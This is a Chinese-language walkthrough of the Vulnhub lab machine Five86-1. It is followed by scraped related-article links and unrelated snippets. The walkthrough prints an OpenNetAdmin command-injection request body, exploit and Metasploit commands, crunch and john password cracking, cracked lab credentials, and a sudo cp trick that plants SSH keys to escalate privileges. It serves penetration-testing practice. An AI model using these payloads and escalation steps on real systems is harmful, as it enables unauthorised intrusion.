five86-1 (OpenNetadmin RCE+cp命令提权+crunch生成密码字典)
Vulnhub-Five86-1
实验环境
kali攻击机ip:192.168.56.116 Five86-1靶机ip:192.168.56.121
知识点及工具
nmap扫描 john爆破 OpenNetAdmin RCE
开始渗透
首先第一步对目标靶机网络
nmap -A –p- 192.168.56.121
扫描发现一个80web端口和一个22ssh端口和10000webmin端口。
Web浏览 http://192.168.56.121,页面啥都没有空白一片
使用dirb工具对目录进行扫描,或者namp扫描也有提示robots.txt和/ona目录
访问/ona
http://192.168.56.121/ona
发现是opennetadmin,exploit-db搜索找到两个poc一个msf的一个sh
先拿sh的文件验证一下,抓取登录包,修改请求方式为post,body添加以下代码
xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping
发现可利用,执行成功了
脚本运行一下
./exp.sh http://192.168.56.121/ona/login.php
或者利用msf的也行,把它复制到/usr/share/metasploit-framework/modules/exploits目录下,然后重新加载msf(命令reload_all)。
set rhosts 192.168.56.121
set lhost 192.168.56.116
exploit
在此发现限制了其他目录访问,可ls,cat 等命令
然后查找一下www-data能够访问的东西
find / -type f -user www-data
在前面两个可以看到能够读取.htaccess文件
cat /var/www/html/reports/.htaccess
看到了douglas账号密码,然后提示aefhrt组合的10个字符
接下来生成密码
crunch 10 10 aefhrt > password.txt
爆破密码
john --wordlist=password.txt douglas
爆破出来得到密码
douglas:fatherrrrr
ssh登录
ssh douglas@192.168.56.121
找了一番 然后sudo –l 发现可cp,然后进行下一步
生成一个jen的ssh密钥吧,看见douglas下存在.ssh,也给jen生成一个
ssh-keygen –t rsa –C “jen@five86-1”
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/
这个就利用了cp命令
切换一个身份
ssh jen@127.0.0.1
登录成功了
登录之后我看见了最后一行提示了你有一封新邮件,然后查看,发现了moss的账号密码
cd /var/maills
cat jen
得到账号密码
moss:Fire!Fire!
再次切换为moss用户
su moss
在moss目录下发现一个.games目录下upyougame运行可root身份
随便你怎么输入只要输入个字符,然后完了就是#(root)号了
five86-1 (OpenNetadmin RCE+cp命令提权+crunch生成密码字典)的更多相关文章
- Linux提权(持续更新)
利用/etc/passwd提权 个人认为,这种提权方式在现实场景中难以实现,条件太过苛刻,但是建立Linux下的隐藏账户是个不错的选择,灵感来自:https://www.hackingarticles ...
- adore-ng笔记和Linux普通用户提权
官网:https://github.com/trimpsyw/adore-ng 安装: [root@xuegod63 ~]# unzipadore-ng-master.zip [root@xuegod ...
- WIN提权总结【本地存档-转载】
[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1 ...
- Meterpreter提权详解
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpr ...
- 暴破助攻提权:ruadmin
i春秋作家:yangyangwithgnu 1 缘由 千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路 ...
- 35.windows提权总结
本文参考自冷逸大佬的博客,源地址在这里:https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/ windows提 ...
- [转载]SQL Server提权系列
本文原文地址:https://www.cnblogs.com/wintrysec/p/10875232.html 一.利用xp_cmdshell提权 xp_cmdshell默认是关闭的,可以通过下面的 ...
- sudo提权,ansible批量给所有主机创建系统账户,授权
sudo(superuser or another do)让普通用户可以以超级管理员或其他人的身份执行命令. sudo基本流程如下: 1.管理员需要先授权(修改/etc/sudoers文件) 2.普通 ...
- MS14-068域提权漏洞复现
MS14-068域提权漏洞复现 一.漏洞说明 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限. 微软官方解释: https://docs.microsoft.com/zh-cn ...
随机推荐
- Linux 安装分区设置分区大小
一.Linux分区挂载点介绍 Linux分区挂载点介绍,推荐容量仅供参考不是绝对,跟各系统用途以及硬盘空间配额等因素实际调整: 分区类型 介绍 备注 /boot 启动分区 一般设置100M-200M, ...
- file转化为binary对象发送给后台
具体代码如下: function filechange(e) { var file = $('#filed').get(0).files[0]; var fileSize = file.size, f ...
- JVM(二)类加载的时机及其过程
类从被加载到虚拟机内存中开始,到卸载出内存为止,它的的整个生命周期包括: 加载(Loading),验证(Verification),准备(Preparation),解析(Resolution),初始化 ...
- PB 级大规模 Elasticsearch 集群运维与调优实践
PB 级大规模 Elasticsearch 集群运维与调优实践 https://mp.weixin.qq.com/s/PDyHT9IuRij20JBgbPTjFA | 导语 腾讯云 Elasticse ...
- 排查golang的性能问题 go pprof 实践
小结: 1.内存消耗分析 list peek 定位到函数 https://mp.weixin.qq.com/s/_LovnIqJYAuDpTm2QmUgrA 使用pprof和go-torch排查 ...
- Jenkins部署springboot项目
记录jenkins如何部署springboot项目(jar类型的) 一.首先需要先配置好jenkins的基本配置(jdk.maven--),可在系统管理-->>全局工具配置中进行配置. 配 ...
- Python 2.x 和 Python 3.x
Python 2.x 默认不支持中文,具体原因,等到介绍 字符编码 时给大家讲解 Python 2.x 的解释器名称是 python Python 3.x 的解释器名称是 python3 目前市场上有 ...
- Webpack4.0各个击破(1)html篇
webpack作为前端最火的构建工具,是前端自动化工具链最重要的部分,使用门槛较高.本系列是笔者自己的学习记录,比较基础,希望通过问题 + 解决方式的模式,以前端构建中遇到的具体需求为出发点,学习we ...
- 强连通分量 与 2-SAT
近期一直在刷这方面的题 因为没法学新知识 但又想写点什么 就水篇博文吧 引理 简单来说,在一个有向图中,若所有点之间两两互相直接可达,则将这个图成为强连通分量 强连通分量可以是某个有向图中的子图 求强 ...
- CF912A
题意 你手里有 A 个黄水晶和 B 个蓝水晶,其中两个黄水晶可以造一个黄水晶球,三个蓝水晶可以造一个蓝水晶球,一黄一蓝两个水晶可以造一个绿水晶球. 现在你需要 x 个黄水晶球,y 个绿水晶球,z 个蓝 ...